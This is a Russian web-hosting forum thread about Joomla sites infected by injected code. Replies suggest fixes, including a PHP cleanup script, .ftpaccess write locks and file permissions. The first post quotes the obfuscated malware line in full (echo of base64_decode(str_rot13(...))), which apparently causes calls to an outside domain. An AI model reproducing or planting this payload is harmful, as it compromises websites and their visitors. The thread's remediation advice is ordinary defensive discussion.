Форум Сайтостроение Веб-строительство

вирус?

J
На сайте с 27.02.2005
Offline
52
janna
973

у меня заразились все 3 сайта на аккаунте хостинга. во все индексные внедрился код в первую строку

$somecrainsignvar="ny2fmed8"; echo base64_decode(str_rot13('VQkmL3WcpUD+VN0XqzSlVTquFaAVo3A0VQ0tXPtvnUE0pQbvVQ09VTEiL3IgMJ50YzkiL2S0nJ9hYaOlo3EiL29fXFN/VPWbqUEjBv8irJShMT

I4VvN6VPWbqUEjBv8irJShMTI4Vvx7VTEiL3IgMJ50YaqlnKEyXUIhMKAwLKOyXPVyZ0AmL3WcpUDtp3WwCFpvVPftM2SXp0uip3DtXlNvYKyuozEyrP51ozxhL2ZiqzIlnJM5YKLkC2yxCFVeGJS0nP5zoT9ipvuALKEbYaWuozEioFtcVP

bmZQNjZPxeVvMapz91pQ0lWaAyo3WyMw0vX2IhL29xMIIFFHAioKOiozIhqPuxo2A1oJIhqP5lMJMypaWypvxeVPVzpTSlLJ1yqTIlCFEeMKy3o3WxWaAyCFEmMFM1pw0kWxuHISOsHxITEIWSHw0vX2IhL29xMIIFFHAioKOiozIhqPuxo2

A1oJIhqP5IHxjcXlVzMTIzLKIfqS9eMKy3o3WxCFptqUyjMG0aqTI4qP9dLKMup2AlnKO0WlHmEFHmDl9mL3WcpUDyZ0HvXFx7QDbtCP9mL3WcpUD+VN==')); $crain="";

И файрбаг показывает какието левые запросы к сайту yandex-yandex.uni.cc

Достаточно ли будет вычистить этот код из файлов?

Как этот вирус внедрился?

Движки сайтов - джумлы.

T
На сайте с 20.03.2007
Offline
67
Toy
#1
Как этот вирус внедрился?

Смените пароль ftp, и обновите joomla до последней версии.

J
На сайте с 27.02.2005
Offline
52
janna
#2
Toy:
Смените пароль ftp, и обновите joomla до последней версии.

ftp сменила уже, но мне кажется не в этом дело, т.к. все пароли фтп у меня в одной проге хранятся, там еще 10 паролей, на другие хостинги, но туда вирус не пролез.

С версией джумлы сложно, один сайт на старом движке 1.0.15

Читала через htaccess можно запретить всякие изменения в папках. Поможет ли?

Взломали сайт Помогите избавиться от вируса Чистка вируса на сайте
R
На сайте с 24.01.2008
Offline
180
Алексей
#3

стучите поможем

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
S
На сайте с 28.10.2005
Offline
319
semenov
#4

http://www.google.ru/search?q=Joomla+%D0%B2%D0%B8%D1%80%D1%83%D1%81

T
На сайте с 05.12.2007
Offline
86
tent
#5

сделай пхп-файл со следующим содержимым и запусти его.

Не забудь путь к директории с сайтами изменить у $dirname

Скрипт ищет пхп-файлы, где есть строки, начинающиеся на $somecrainsignvar и удаляет все что начинается с этого слова и до конца строки. 

<?php

function dir_tree($dir) {

   $path = '';

   $stack[] = $dir;

   while ($stack) {

       $thisdir = array_pop($stack);

       if ($dircont = scandir($thisdir)) {

           $i=0;

           while (isset($dircont[$i])) {

               if ($dircont[$i] !== '.' && $dircont[$i] !== '..') {

                   $current_file = "{$thisdir}/{$dircont[$i]}";

                   if (is_file($current_file)) {

                       $path[] = "{$thisdir}/{$dircont[$i]}";

                   } elseif (is_dir($current_file)) {

                        $path[] = "{$thisdir}/{$dircont[$i]}";

                       $stack[] = $current_file;

                   }

               }

               $i++;

           }

       }

   }

   return $path;

}







$my_ext = "php";

$my_str_begin = "[$]somecrainsignvar=";

$my_str_end = "[$]crain=\"\";";

$my_regexp = "/".$my_str_begin. ".*" .$my_str_end."/is";



$dirname = "ТУТ_УКАЗАТЬ_ДИРЕКТОРИЮ_К_САЙТАМ";



chdir($dirname);





$heap  = dir_tree($dirname);



$cheap = count($heap);







for ($i = 0; $i < $cheap; $i++)

{

    $filename =  $heap[$i];

    $path_info = pathinfo($filename);

    $pathext =  $path_info['extension'];

    

    if ($pathext == $my_ext)

    {

        echo $filename;

        echo "<br />\n";

        $fp = file_get_contents($filename);



        $fo = preg_replace($my_regexp,"",$fp);

        echo "Saved " . file_put_contents($filename, $fo) . " Bytes";

        echo "<br />\n";

    }

}

?>
Подскажите с ПХП Не запускается установка вордпресс. Помогите со скриптом
iren K
На сайте с 28.12.2008
Offline
222
iren K
#6
janna:

Читала через htaccess можно запретить всякие изменения в папках

- залейте для начала .ftpaccess

<Limit WRITE>

DenyAll

</Limit>

и подключайтесь только через ssh(2)

- на все индексные файлы поставьте права 444

- в htaccess впишите бан по ip для выявленых Вами адресов:

файрбаг показывает какието левые запросы к сайту yandex-yandex.uni.cc
..

- это только для начала..)

c уважением Iren
S2
На сайте с 13.06.2011
Offline
0
smart2011
#7

Попробуйте просканировать Ваш сайт с помощью http://find-xss.net/

Я у себя нашел кучу дыр в безопасности. Думаю, Вам поможет

[Удален]
#8

smart2011 спасибо за ссылку, действительно полезная вещь.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий